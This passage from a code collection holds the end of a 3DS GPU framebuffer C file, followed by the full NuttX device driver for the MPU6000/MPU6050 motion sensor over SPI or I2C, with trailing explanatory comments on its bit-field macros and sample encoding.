GPUCMD_AddWrite(GPUREG_FRAMEBUFFER_INVALIDATE, 1); param[0] = osConvertVirtToPhys(fb->depthBuf) >> 3; param[1] = osConvertVirtToPhys(fb->colorBuf) >> 3; param[2] = 0x01000000 | (((u32)(fb->height-1) & 0xFFF) << 12) | (fb->width & 0xFFF); GPUCMD_AddIncrementalWrites(GPUREG_DEPTHBUFFER_LOC, param, 3); GPUCMD_AddWrite(GPUREG_RENDERBUF_DIM, param[2]); GPUCMD_AddWrite(GPUREG_DEPTHBUFFER_FORMAT, fb->depthFmt); GPUCMD_AddWrite(GPUREG_COLORBUFFER_FORMAT, colorFmtSizes[fb->colorFmt] | ((u32)fb->colorFmt << 16)); GPUCMD_AddWrite(GPUREG_FRAMEBUFFER_BLOCK32, fb->block32 ? 1 : 0); // Enable or disable color/depth buffers param[0] = param[1] = fb->colorBuf ? fb->colorMask : 0; param[2] = param[3] = fb->depthBuf ? fb->depthMask : 0; GPUCMD_AddIncrementalWrites(GPUREG_COLORBUFFER_READ, param, 4); } void C3D_FrameBufClear(C3D_FrameBuf* frameBuf, C3D_ClearBits clearBits, u32 clearColor, u32 clearDepth) { u32 size = (u32)frameBuf->width * frameBuf->height; u32 cfs = colorFmtSizes[frameBuf->colorFmt]; u32 dfs = depthFmtSizes[frameBuf->depthFmt]; void* colorBufEnd = (u8*)frameBuf->colorBuf + size*(2+cfs); void* depthBufEnd = (u8*)frameBuf->depthBuf + size*(2+dfs); if (clearBits & C3D_CLEAR_COLOR) { if (clearBits & C3D_CLEAR_DEPTH) GX_MemoryFill( (u32*)frameBuf->colorBuf, clearColor, (u32*)colorBufEnd, BIT(0) | (cfs << 8), (u32*)frameBuf->depthBuf, clearDepth, (u32*)depthBufEnd, BIT(0) | (dfs << 8)); else GX_MemoryFill( (u32*)frameBuf->colorBuf, clearColor, (u32*)colorBufEnd, BIT(0) | (cfs << 8), NULL, 0, NULL, 0); } else GX_MemoryFill( (u32*)frameBuf->depthBuf, clearDepth, (u32*)depthBufEnd, BIT(0) | (dfs << 8), NULL, 0, NULL, 0); } void C3D_FrameBufTransfer(C3D_FrameBuf* frameBuf, gfxScreen_t screen, gfx3dSide_t side, u32 transferFlags) { u32* outputFrameBuf = (u32*)gfxGetFramebuffer(screen, side, NULL, NULL); u32 dim = GX_BUFFER_DIM((u32)frameBuf->width, (u32)frameBuf->height); GX_DisplayTransfer((u32*)frameBuf->colorBuf, dim, outputFrameBuf, dim, transferFlags); }
998649.c
/**************************************************************************** * drivers/sensors/mpu60x0.c * * Support for the Invensense MPU6000 and MPU6050 MotionTracking(tm) * 6-axis accelerometer and gyroscope. * * Copyright (C) 2019 Bill Gatliff. All rights reserved. * Author: Bill Gatliff <bgat@billgatliff.com> * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright+ * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * 3. Neither the name NuttX nor the names of its contributors may be * used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN * ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. * ****************************************************************************/ /**************************************************************************** * TODO: Theory of Operation ****************************************************************************/ /**************************************************************************** * Included Files ****************************************************************************/ #include <nuttx/config.h> #include <errno.h> #include <debug.h> #include <string.h> #include <limits.h> #include <nuttx/mutex.h> #include <nuttx/signal.h> #include <nuttx/compiler.h> #include <nuttx/kmalloc.h> #ifdef CONFIG_MPU60X0_SPI #include <nuttx/spi/spi.h> #else #include <nuttx/i2c/i2c_master.h> #endif #include <nuttx/fs/fs.h> #include <nuttx/sensors/mpu60x0.h> /**************************************************************************** * Pre-processor Definitions ****************************************************************************/ /* Sets bit @n */ #define BIT(n) (1 << (n)) /* Creates a mask of @m bits, i.e. 
MASK(2) -> 00000011 */

#define MASK(m) (BIT(m) - 1)

/* Masks and shifts @v into bit field @m */

#define TO_BITFIELD(m,v) (((v) & MASK(m ##__WIDTH)) << (m ##__SHIFT))

/* Un-masks and un-shifts bit field @m from @v */

#define FROM_BITFIELD(m,v) (((v) >> (m ##__SHIFT)) & MASK(m ##__WIDTH))

/* SPI read/write codes */

#define MPU_REG_READ 0x80
#define MPU_REG_WRITE 0

/****************************************************************************
 * Private Types
 ****************************************************************************/

enum mpu_regaddr_e
{
  SELF_TEST_X = 0x0d,
  SELF_TEST_Y = 0x0e,
  SELF_TEST_Z = 0x0f,
  SELF_TEST_A = 0x10,
  SMPLRT_DIV = 0x19,

  /* __SHIFT : number of empty bits to the right of the field
   * __WIDTH : width of the field, in bits
   *
   * single-bit fields don't have __SHIFT or __WIDTH
   */

  CONFIG = 0x1a,
  CONFIG__EXT_SYNC_SET__SHIFT = 3,
  CONFIG__EXT_SYNC_SET__WIDTH = 2,
  CONFIG__DLPF_CFG__SHIFT = 0,
  CONFIG__DLPF_CFG__WIDTH = 2,

  GYRO_CONFIG = 0x1b,
  GYRO_CONFIG__XG_ST = BIT(7),
  GYRO_CONFIG__YG_ST = BIT(6),
  GYRO_CONFIG__ZG_ST = BIT(5),
  GYRO_CONFIG__FS_SEL__SHIFT = 3,
  GYRO_CONFIG__FS_SEL__WIDTH = 2,

  ACCEL_CONFIG = 0x1c,
  ACCEL_CONFIG__XA_ST = BIT(7),
  ACCEL_CONFIG__YA_ST = BIT(6),
  ACCEL_CONFIG__ZA_ST = BIT(5),
  ACCEL_CONFIG__AFS_SEL__SHIFT = 3,
  ACCEL_CONFIG__AFS_SEL__WIDTH = 2,

  MOT_THR = 0x1f,
  FIFO_EN = 0x23,
  I2C_MST_CTRL = 0x24,
  I2C_SLV0_ADDR = 0x25,
  I2C_SLV0_REG = 0x26,
  I2C_SLV0_CTRL = 0x27,
  I2C_SLV1_ADDR = 0x28,
  I2C_SLV1_REG = 0x29,
  I2C_SLV1_CTRL = 0x2a,
  I2C_SLV2_ADDR = 0x2b,
  I2C_SLV2_REG = 0x2c,
  I2C_SLV2_CTRL = 0x2d,
  I2C_SLV3_ADDR = 0x2e,
  I2C_SLV3_REG = 0x2f,
  I2C_SLV3_CTRL = 0x30,
  I2C_SLV4_ADDR = 0x31,
  I2C_SLV4_REG = 0x32,
  I2C_SLV4_DO = 0x33,
  I2C_SLV4_CTRL = 0x34,
  I2C_SLV4_DI = 0x35,           /* RO */
  I2C_MST_STATUS = 0x36,        /* RO */

  INT_PIN_CFG = 0x37,
  INT_PIN_CFG__INT_LEVEL = BIT(7),
  INT_PIN_CFG__INT_OPEN = BIT(6),
  INT_PIN_CFG__LATCH_INT_EN = BIT(5),
  INT_PIN_CFG__INT_RD_CLEAR = BIT(4),
  INT_PIN_CFG__FSYNC_INT_LEVEL = BIT(3),
  INT_PIN_CFG__FSYNC_INT_EN = BIT(2),
  INT_PIN_CFG__I2C_BYPASS_EN = BIT(1),

  INT_ENABLE = 0x38,
  INT_STATUS = 0x3a,            /* RO */

  ACCEL_XOUT_H = 0x3b,          /* RO */
  ACCEL_XOUT_L = 0x3c,          /* RO */
  ACCEL_YOUT_H = 0x3d,          /* RO */
  ACCEL_YOUT_L = 0x3e,          /* RO */
  ACCEL_ZOUT_H = 0x3f,          /* RO */
  ACCEL_ZOUT_L = 0x40,          /* RO */
  TEMP_OUT_H = 0x41,            /* RO */
  TEMP_OUT_L = 0x42,            /* RO */
  GYRO_XOUT_H = 0x43,           /* RO */
  GYRO_XOUT_L = 0x44,           /* RO */
  GYRO_YOUT_H = 0x45,           /* RO */
  GYRO_YOUT_L = 0x46,           /* RO */
  GYRO_ZOUT_H = 0x47,           /* RO */
  GYRO_ZOUT_L = 0x48,           /* RO */
  EXT_SENS_DATA_00 = 0x49,      /* RO */
  EXT_SENS_DATA_01 = 0x4a,      /* RO */
  EXT_SENS_DATA_02 = 0x4b,      /* RO */
  EXT_SENS_DATA_03 = 0x4c,      /* RO */
  EXT_SENS_DATA_04 = 0x4d,      /* RO */
  EXT_SENS_DATA_05 = 0x4e,      /* RO */
  EXT_SENS_DATA_06 = 0x4f,      /* RO */
  EXT_SENS_DATA_07 = 0x50,      /* RO */
  EXT_SENS_DATA_08 = 0x51,      /* RO */
  EXT_SENS_DATA_09 = 0x52,      /* RO */
  EXT_SENS_DATA_10 = 0x53,      /* RO */
  EXT_SENS_DATA_11 = 0x54,      /* RO */
  EXT_SENS_DATA_12 = 0x55,      /* RO */
  EXT_SENS_DATA_13 = 0x56,      /* RO */
  EXT_SENS_DATA_14 = 0x57,      /* RO */
  EXT_SENS_DATA_15 = 0x58,      /* RO */
  EXT_SENS_DATA_16 = 0x59,      /* RO */
  EXT_SENS_DATA_17 = 0x5a,      /* RO */
  EXT_SENS_DATA_18 = 0x5b,      /* RO */
  EXT_SENS_DATA_19 = 0x5c,      /* RO */
  EXT_SENS_DATA_20 = 0x5d,      /* RO */
  EXT_SENS_DATA_21 = 0x5e,      /* RO */
  EXT_SENS_DATA_22 = 0x5f,      /* RO */
  EXT_SENS_DATA_23 = 0x60,      /* RO */

  I2C_SLV0_DO = 0x63,
  I2C_SLV1_DO = 0x64,
  I2C_SLV2_DO = 0x65,
  I2C_SLV3_DO = 0x66,
  I2C_MST_DELAY_CTRL = 0x67,

  SIGNAL_PATH_RESET = 0x68,
  SIGNAL_PATH_RESET__GYRO_RESET = BIT(2),
  SIGNAL_PATH_RESET__ACCEL_RESET = BIT(1),
  SIGNAL_PATH_RESET__TEMP_RESET =
BIT(0), SIGNAL_PATH_RESET__ALL_RESET = BIT(3) - 1, MOT_DETECT_CTRL = 0x69, USER_CTRL = 0x6a, USER_CTRL__FIFO_EN = BIT(6), USER_CTRL__I2C_MST_EN = BIT(5), USER_CTRL__I2C_IF_DIS = BIT(4), USER_CTRL__FIFO_RESET = BIT(2), USER_CTRL__I2C_MST_RESET = BIT(1), USER_CTRL__SIG_COND_RESET = BIT(0), PWR_MGMT_1 = 0x6b, /* Reset: 0x40 */ PWR_MGMT_1__DEVICE_RESET = BIT(7), PWR_MGMT_1__SLEEP = BIT(6), PWR_MGMT_1__CYCLE = BIT(5), PWR_MGMT_1__TEMP_DIS = BIT(3), PWR_MGMT_1__CLK_SEL__SHIFT = 0, PWR_MGMT_1__CLK_SEL__WIDTH = 3, PWR_MGMT_2 = 0x6c, FIFO_COUNTH = 0x72, FIFO_COUNTL = 0x73, FIFO_R_W = 0x74, WHO_AM_I = 0x75, /* RO reset: 0x68 */ }; /* Describes the mpu60x0 sensor register file. This structure reflects * the underlying hardware, so don't change it! */ begin_packed_struct struct sensor_data_s { int16_t x_accel; int16_t y_accel; int16_t z_accel; int16_t temp; int16_t x_gyro; int16_t y_gyro; int16_t z_gyro; } end_packed_struct; /* Used by the driver to manage the device */ struct mpu_dev_s { mutex_t lock; /* mutex for this structure */ struct mpu_config_s config; /* board-specific information */ struct sensor_data_s buf; /* temporary buffer (for read(), etc.) */ size_t bufpos; /* cursor into @buf, in bytes (!) */ }; /**************************************************************************** * Private Function Function Prototypes ****************************************************************************/ static int mpu_open(FAR struct file *filep); static int mpu_close(FAR struct file *filep); static ssize_t mpu_read(FAR struct file *filep, FAR char *buf, size_t len); static ssize_t mpu_write(FAR struct file *filep, FAR const char *buf, size_t len); static off_t mpu_seek(FAR struct file *filep, off_t offset, int whence); static int mpu_ioctl(FAR struct file *filep, int cmd, unsigned long arg); /**************************************************************************** * Private Data ****************************************************************************/ static const struct file_operations g_mpu_fops = { mpu_open, mpu_close, mpu_read, mpu_write, mpu_seek, mpu_ioctl, NULL #ifndef CONFIG_DISABLE_PSEUDOFS_OPERATIONS , NULL #endif }; /**************************************************************************** * Private Functions ****************************************************************************/ /* NOTE : * * In all of the following code, functions named with a double leading * underscore '__' must be invoked ONLY if the mpu_dev_s lock is * already held. Failure to do this might cause the transaction to get * interrupted, which will likely confuse the data you get back. * * The mpu_dev_s lock is NOT the same thing as, i.e. the SPI master * interface lock: the latter protects the bus interface hardware * (which may have other SPI devices attached), the former protects * the chip and its associated data. */ #ifdef CONFIG_MPU60X0_SPI /* __mpu_read_reg(), but for spi-connected devices. See that function * for documentation. */ static int __mpu_read_reg_spi(FAR struct mpu_dev_s *dev, enum mpu_regaddr_e reg_addr, FAR uint8_t *buf, uint8_t len) { int ret; FAR struct spi_dev_s *spi = dev->config.spi; int id = dev->config.spi_devid; /* We'll probably return the number of bytes asked for. */ ret = len; /* Grab and configure the SPI master device: always mode 0, 20MHz if it's a * data register, 1MHz otherwise (per datasheet). 
*/ SPI_LOCK(spi, true); SPI_SETMODE(spi, SPIDEV_MODE0); if ((reg_addr >= ACCEL_XOUT_H) && ((reg_addr + len) <= I2C_SLV0_DO)) { SPI_SETFREQUENCY(spi, 20000000); } else { SPI_SETFREQUENCY(spi, 1000000); } /* Select the chip. */ SPI_SELECT(spi, id, true); /* Send the read request. */ SPI_SEND(spi, reg_addr | MPU_REG_READ); /* Clock in the data. */ while (0 != len--) { *buf++ = (uint8_t) (SPI_SEND(spi, 0xff)); } /* Deselect the chip, release the SPI master. */ SPI_SELECT(spi, id, false); SPI_LOCK(spi, false); return ret; } /* __mpu_write_reg(), but for SPI connections. */ static int __mpu_write_reg_spi(FAR struct mpu_dev_s *dev, enum mpu_regaddr_e reg_addr, FAR const uint8_t * buf, uint8_t len) { int ret; FAR struct spi_dev_s *spi = dev->config.spi; int id = dev->config.spi_devid; /* Hopefully, we'll return all the bytes they're asking for. */ ret = len; /* Grab and configure the SPI master device. */ SPI_LOCK(spi, true); SPI_SETMODE(spi, SPIDEV_MODE0); SPI_SETFREQUENCY(spi, 1000000); /* Select the chip. */ SPI_SELECT(spi, id, true); /* Send the write request. */ SPI_SEND(spi, reg_addr | MPU_REG_WRITE); /* Send the data. */ while (0 != len--) { SPI_SEND(spi, *buf++); } /* Release the chip and SPI master. */ SPI_SELECT(spi, id, false); SPI_LOCK(spi, false); return ret; } #else /* __mpu_read_reg(), but for i2c-connected devices. */ static int __mpu_read_reg_i2c(FAR struct mpu_dev_s *dev, enum mpu_regaddr_e reg_addr, FAR uint8_t *buf, uint8_t len) { int ret; struct i2c_msg_s msg[2]; msg[0].frequency = CONFIG_MPU60X0_I2C_FREQ; msg[0].addr = dev->config.addr; msg[0].flags = I2C_M_NOSTOP; msg[0].buffer = &reg_addr; msg[0].length = 1; msg[1].frequency = CONFIG_MPU60X0_I2C_FREQ; msg[1].addr = dev->config.addr; msg[1].flags = I2C_M_READ; msg[1].buffer = buf; msg[1].length = len; ret = I2C_TRANSFER(dev->config.i2c, msg, 2); if (ret < 0) { snerr("ERROR: I2C_TRANSFER(read) failed: %d\n", ret); return ret; } return OK; } static int __mpu_write_reg_i2c(FAR struct mpu_dev_s *dev, enum mpu_regaddr_e reg_addr, FAR const uint8_t *buf, uint8_t len) { int ret; struct i2c_msg_s msg[2]; msg[0].frequency = CONFIG_MPU60X0_I2C_FREQ; msg[0].addr = dev->config.addr; msg[0].flags = I2C_M_NOSTOP; msg[0].buffer = &reg_addr; msg[0].length = 1; msg[1].frequency = CONFIG_MPU60X0_I2C_FREQ; msg[1].addr = dev->config.addr; msg[1].flags = I2C_M_NOSTART; msg[1].buffer = (FAR uint8_t *)buf; msg[1].length = len; ret = I2C_TRANSFER(dev->config.i2c, msg, 2); if (ret < 0) { snerr("ERROR: I2C_TRANSFER(write) failed: %d\n", ret); return ret; } return OK; } #endif /* CONFIG_MPU60X0_SPI */ /* __mpu_read_reg() * * Reads a block of @len byte-wide registers, starting at @reg_addr, * from the device connected to @dev. Bytes are returned in @buf, * which must have a capacity of at least @len bytes. * * Note: The caller must hold @dev->lock before calling this function. * * Returns number of bytes read, or a negative errno. */ static inline int __mpu_read_reg(FAR struct mpu_dev_s *dev, enum mpu_regaddr_e reg_addr, FAR uint8_t *buf, uint8_t len) { #ifdef CONFIG_MPU60X0_SPI /* If we're wired to SPI, use that function. */ if (dev->config.spi != NULL) { return __mpu_read_reg_spi(dev, reg_addr, buf, len); } #else /* If we're wired to I2C, use that function. */ if (dev->config.i2c != NULL) { return __mpu_read_reg_i2c(dev, reg_addr, buf, len); } #endif /* If we get this far, it's because we can't "find" our device. 
*/ return -ENODEV; } /* __mpu_write_reg() * * Writes a block of @len byte-wide registers, starting at @reg_addr, * using the values in @buf to the device connected to @dev. Register * values are taken in numerical order from @buf, i.e.: * * buf[0] -> register[@reg_addr] * buf[1] -> register[@reg_addr + 1] * ... * * Note: The caller must hold @dev->lock before calling this function. * * Returns number of bytes written, or a negative errno. */ static inline int __mpu_write_reg(FAR struct mpu_dev_s *dev, enum mpu_regaddr_e reg_addr, FAR const uint8_t *buf, uint8_t len) { #ifdef CONFIG_MPU60X0_SPI /* If we're connected to SPI, use that function. */ if (dev->config.spi != NULL) { return __mpu_write_reg_spi(dev, reg_addr, buf, len); } #else if (dev->config.i2c != NULL) { return __mpu_write_reg_i2c(dev, reg_addr, buf, len); } #endif /* If we get this far, it's because we can't "find" our device. */ return -ENODEV; } /* __mpu_read_imu() * * Reads the whole IMU data file from @dev in one uninterrupted pass, * placing the sampled values into @buf. This function is the only way * to guarantee that the measured values are sampled as closely-spaced * in time as the hardware permits, which is almost always what you * want. */ static inline int __mpu_read_imu(FAR struct mpu_dev_s *dev, FAR struct sensor_data_s *buf) { return __mpu_read_reg(dev, ACCEL_XOUT_H, (uint8_t *) buf, sizeof(*buf)); } /* __mpu_read_pwr_mgmt_1() * * Returns the value of the PWR_MGMT_1 register from @dev. */ static inline uint8_t __mpu_read_pwr_mgmt_1(FAR struct mpu_dev_s *dev) { uint8_t buf = 0xff; __mpu_read_reg(dev, PWR_MGMT_1, &buf, sizeof(buf)); return buf; } static inline int __mpu_write_signal_path_reset(FAR struct mpu_dev_s *dev, uint8_t val) { return __mpu_write_reg(dev, SIGNAL_PATH_RESET, &val, sizeof(val)); } static inline int __mpu_write_int_pin_cfg(FAR struct mpu_dev_s *dev, uint8_t val) { return __mpu_write_reg(dev, INT_PIN_CFG, &val, sizeof(val)); } static inline int __mpu_write_pwr_mgmt_1(FAR struct mpu_dev_s *dev, uint8_t val) { return __mpu_write_reg(dev, PWR_MGMT_1, &val, sizeof(val)); } static inline int __mpu_write_pwr_mgmt_2(FAR struct mpu_dev_s *dev, uint8_t val) { return __mpu_write_reg(dev, PWR_MGMT_2, &val, sizeof(val)); } static inline int __mpu_write_user_ctrl(FAR struct mpu_dev_s *dev, uint8_t val) { return __mpu_write_reg(dev, USER_CTRL, &val, sizeof(val)); } /* __mpu_write_gyro_config() : * * Sets the @fs_sel bit in GYRO_CONFIG to the value provided. Per the * datasheet, the meaning of @fs_sel is as follows: * * GYRO_CONFIG(0x1b) : XG_ST YG_ST ZG_ST FS_SEL1 FS_SEL0 x x x * * XG_ST, YG_ST, ZG_ST : self-test (unsupported in this driver) * 1 -> activate self-test on X, Y, and/or Z gyros * * FS_SEL[10] : full-scale range select * 0 -> ± 250 deg/sec * 1 -> ± 500 deg/sec * 2 -> ± 1000 deg/sec * 3 -> ± 2000 deg/sec */ static inline int __mpu_write_gyro_config(FAR struct mpu_dev_s *dev, uint8_t fs_sel) { uint8_t val = TO_BITFIELD(GYRO_CONFIG__FS_SEL, fs_sel); return __mpu_write_reg(dev, GYRO_CONFIG, &val, sizeof(val)); } /* __mpu_write_accel_config() : * * Sets the @afs_sel bit in ACCEL_CONFIG to the value provided. 
Per * the datasheet, the meaning of @afs_sel is as follows: * * ACCEL_CONFIG(0x1c) : XA_ST YA_ST ZA_ST AFS_SEL1 AFS_SEL0 x x x * * XA_ST, YA_ST, ZA_ST : self-test (unsupported in this driver) * 1 -> activate self-test on X, Y, and/or Z accelerometers * * AFS_SEL[10] : full-scale range select * 0 -> ± 2 g * 1 -> ± 4 g * 2 -> ± 8 g * 3 -> ± 16 g */ static inline int __mpu_write_accel_config(FAR struct mpu_dev_s *dev, uint8_t afs_sel) { uint8_t val = TO_BITFIELD(ACCEL_CONFIG__AFS_SEL, afs_sel); return __mpu_write_reg(dev, ACCEL_CONFIG, &val, sizeof(val)); } /* CONFIG (0x1a) : x x EXT_SYNC_SET[2..0] DLPF_CFG[2..0] * * EXT_SYNC_SET : frame sync bit position * DLPF_CFG : digital low-pass filter bandwidth * (see datasheet, it's ... complicated) */ static inline int __mpu_write_config(FAR struct mpu_dev_s *dev, uint8_t ext_sync_set, uint8_t dlpf_cfg) { uint8_t val = TO_BITFIELD(CONFIG__EXT_SYNC_SET, ext_sync_set) | TO_BITFIELD(CONFIG__DLPF_CFG, dlpf_cfg); return __mpu_write_reg(dev, CONFIG, &val, sizeof(val)); } /* WHO_AM_I (0x75) : read-only, always returns 0x68 for mpu60x0 */ static inline uint8_t __mpu_read_who_am_i(FAR struct mpu_dev_s *dev) { uint8_t val = 0xff; __mpu_read_reg(dev, WHO_AM_I, &val, sizeof(val)); return val; } /* Locks and unlocks the @dev data structure (mutex). * * Use these functions any time you call one of the lock-dependent * helper functions defined above. */ static void inline mpu_lock(FAR struct mpu_dev_s *dev) { nxmutex_lock(&dev->lock); } static void inline mpu_unlock(FAR struct mpu_dev_s *dev) { nxmutex_unlock(&dev->lock); } /* Resets the mpu60x0, sets it to a default configuration. */ static int mpu_reset(FAR struct mpu_dev_s *dev) { #ifdef CONFIG_MPU60X0_SPI if (dev->config.spi == NULL) { return -EINVAL; } #else if (dev->config.i2c == NULL) { return -EINVAL; } #endif mpu_lock(dev); /* Awaken chip, issue hardware reset */ __mpu_write_pwr_mgmt_1(dev, PWR_MGMT_1__DEVICE_RESET); /* Wait for reset cycle to finish (note: per the datasheet, we don't need * to hold NSS for this) */ do { nxsig_usleep(50000); /* usecs (arbitrary) */ } while (__mpu_read_pwr_mgmt_1(dev) & PWR_MGMT_1__DEVICE_RESET); /* Reset signal paths */ __mpu_write_signal_path_reset(dev, SIGNAL_PATH_RESET__ALL_RESET); nxsig_usleep(2000); /* Disable SLEEP, use PLL with z-axis clock source */ __mpu_write_pwr_mgmt_1(dev, 3); nxsig_usleep(2000); /* Disable i2c if we're on spi. */ #ifdef CONFIG_MPU60X0_SPI if (dev->config.spi) { __mpu_write_user_ctrl(dev, USER_CTRL__I2C_IF_DIS); } #endif /* Disable low-power mode, enable all gyros and accelerometers */ __mpu_write_pwr_mgmt_2(dev, 0); /* No FSYNC, set accel LPF at 184 Hz, gyro LPF at 188 Hz */ __mpu_write_config(dev, 0, 1); /* ± 1000 deg/sec */ __mpu_write_gyro_config(dev, 2); /* ± 8g */ __mpu_write_accel_config(dev, 2); /* clear INT on any read (we aren't using that pin right now) */ __mpu_write_int_pin_cfg(dev, INT_PIN_CFG__INT_RD_CLEAR); mpu_unlock(dev); return 0; } /**************************************************************************** * Name: mpu_open * * Note: we don't deal with multiple users trying to access this interface at * the same time. Until further notice, don't do that. * * And no, it's not as simple as just prohibiting concurrent opens or * reads with a mutex: there are legit reasons for truy concurrent * access, but they must be treated carefully in this interface lest a * partial reader end up with a mixture of old and new samples. This * will make some users unhappy. 
* ****************************************************************************/ static int mpu_open(FAR struct file *filep) { FAR struct inode *inode = filep->f_inode; FAR struct mpu_dev_s *dev = inode->i_private; /* Reset the register cache */ mpu_lock(dev); dev->bufpos = 0; mpu_unlock(dev); return 0; } /**************************************************************************** * Name: mpu_close ****************************************************************************/ static int mpu_close(FAR struct file *filep) { FAR struct inode *inode = filep->f_inode; FAR struct mpu_dev_s *dev = inode->i_private; /* Reset (clear) the register cache. */ mpu_lock(dev); dev->bufpos = 0; mpu_unlock(dev); return 0; } /**************************************************************************** * Name: mpu_read * * Returns a snapshot of the accelerometer, temperature, and gyro registers. * * Note: the chip uses traditional, twos-complement notation, i.e. "0" * is encoded as 0, and full-scale-negative is 0x8000, and * full-scale-positive is 0x7fff. If we read the registers * sequentially and directly into memory (as we do), the measurements * from each sensor are captured as big endian words. * * In contrast, ASN.1 maps "0" to 0x8000, full-scale-negative to 0, * and full-scale-positive to 0xffff. So if we want to send in a * format that an ASN.1 PER-decoder would recognize, must: * * 1. Treat the register data/measurements as unsigned, * 2. Add 0x8000 to each measurement, and then, * 3. Send each word in big-endian order. * * The result of the above will be something you could neatly describe * like this (confirmed with asn1scc): * * Sint16 ::= INTEGER(-32768..32767) * * Mpu60x0Sample ::= SEQUENCE * { * accel-X Sint16, * accel-Y Sint16, * accel-Z Sint16, * temp Sint16, * gyro-X Sint16, * gyro-Y Sint16, * gyro-Z Sint16 * } * ****************************************************************************/ static ssize_t mpu_read(FAR struct file *filep, FAR char *buf, size_t len) { FAR struct inode *inode = filep->f_inode; FAR struct mpu_dev_s *dev = inode->i_private; size_t send_len = 0; mpu_lock(dev); /* Populate the register cache if it seems empty. */ if (!dev->bufpos) { __mpu_read_imu(dev, &dev->buf); } /* Send the lesser of: available bytes, or amount requested. */ send_len = sizeof(dev->buf) - dev->bufpos; if (send_len > len) { send_len = len; } if (send_len) { memcpy(buf, ((uint8_t *)&dev->buf) + dev->bufpos, send_len); } /* Move the cursor, to mark them as sent. */ dev->bufpos += send_len; /* If we've sent the last byte, reset the buffer. 
*/ if (dev->bufpos >= sizeof(dev->buf)) { dev->bufpos = 0; } mpu_unlock(dev); return send_len; } /**************************************************************************** * Name: mpu_write ****************************************************************************/ static ssize_t mpu_write(FAR struct file *filep, FAR const char *buf, size_t len) { FAR struct inode *inode = filep->f_inode; FAR struct mpu_dev_s *dev = inode->i_private; UNUSED(inode); UNUSED(dev); snerr("ERROR: %p %p %d\n", inode, dev, len); return len; } /**************************************************************************** * Name: mpu60x0_seek ****************************************************************************/ static off_t mpu_seek(FAR struct file *filep, off_t offset, int whence) { FAR struct inode *inode = filep->f_inode; FAR struct mpu_dev_s *dev = inode->i_private; UNUSED(inode); UNUSED(dev); snerr("ERROR: %p %p\n", inode, dev); return 0; } /**************************************************************************** * Name: mpu60x0_ioctl ****************************************************************************/ static int mpu_ioctl(FAR struct file *filep, int cmd, unsigned long arg) { FAR struct inode *inode = filep->f_inode; FAR struct mpu_dev_s *dev = inode->i_private; UNUSED(inode); UNUSED(dev); snerr("ERROR: %p %p\n", inode, dev); /* ENOTTY is the standard return if an IOCTL command is not supported. */ return -ENOTTY; } /**************************************************************************** * Public Functions ****************************************************************************/ /**************************************************************************** * Name: mpu60x0_register * * Description: * Registers the mpu60x0 interface as 'devpath' * * Input Parameters: * devpath - The full path to the interface to register. E.g., "/dev/imu0" * spi - SPI interface for chip communications * config - Configuration information * * Returned Value: * Zero (OK) on success; a negated errno value on failure. * ****************************************************************************/ int mpu60x0_register(FAR const char *path, FAR struct mpu_config_s *config) { FAR struct mpu_dev_s *priv; int ret; /* Without config info, we can't do anything. */ if (config == NULL) { return -EINVAL; } /* Initialize the device structure. */ priv = (FAR struct mpu_dev_s *)kmm_malloc(sizeof(struct mpu_dev_s)); if (priv == NULL) { snerr("ERROR: Failed to allocate mpu60x0 device instance\n"); return -ENOMEM; } memset(priv, 0, sizeof(*priv)); nxmutex_init(&priv->lock); /* Keep a copy of the config structure, in case the caller discards * theirs. */ priv->config = *config; /* Register the device node. */ ret = register_driver(path, &g_mpu_fops, 0666, priv); if (ret < 0) { snerr("ERROR: Failed to register mpu60x0 interface: %d\n", ret); nxmutex_destroy(&priv->lock); kmm_free(priv); return ret; } /* Reset the chip, to give it an initial configuration. */ return mpu_reset(priv); }
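/*
 * Editor's note: a minimal sketch (not part of the driver) of the
 * bit-field helpers defined near the top of this file, using GYRO_CONFIG's
 * FS_SEL field (__SHIFT = 3, __WIDTH = 2). With fs_sel = 2 (+/- 1000
 * deg/s), TO_BITFIELD masks the value to 2 bits and shifts it into place:
 * (2 & 0b11) << 3 == 0x10, and FROM_BITFIELD reverses the operation.
 */
#if 0   /* illustration only -- compile stand-alone */
#include <stdio.h>
#include <stdint.h>

#define BIT(n)              (1 << (n))
#define MASK(m)             (BIT(m) - 1)
#define TO_BITFIELD(m,v)    (((v) & MASK(m ##__WIDTH)) << (m ##__SHIFT))
#define FROM_BITFIELD(m,v)  (((v) >> (m ##__SHIFT)) & MASK(m ##__WIDTH))

#define GYRO_CONFIG__FS_SEL__SHIFT 3
#define GYRO_CONFIG__FS_SEL__WIDTH 2

int main(void)
{
  uint8_t reg = TO_BITFIELD(GYRO_CONFIG__FS_SEL, 2);
  printf("GYRO_CONFIG = 0x%02x, fs_sel = %d\n",
         (unsigned)reg, FROM_BITFIELD(GYRO_CONFIG__FS_SEL, reg));
  /* Prints: GYRO_CONFIG = 0x10, fs_sel = 2 */
  return 0;
}
#endif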
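/*
 * Editor's note: a sketch (not part of the driver) of the encoding rule
 * described above mpu_read(): to turn a raw two's-complement sample into
 * the offset-binary form an ASN.1 PER decoder expects, treat the 16-bit
 * word as unsigned, add 0x8000, and keep big-endian byte order on the
 * wire. The helper name is hypothetical.
 */
#if 0   /* illustration only -- compile stand-alone */
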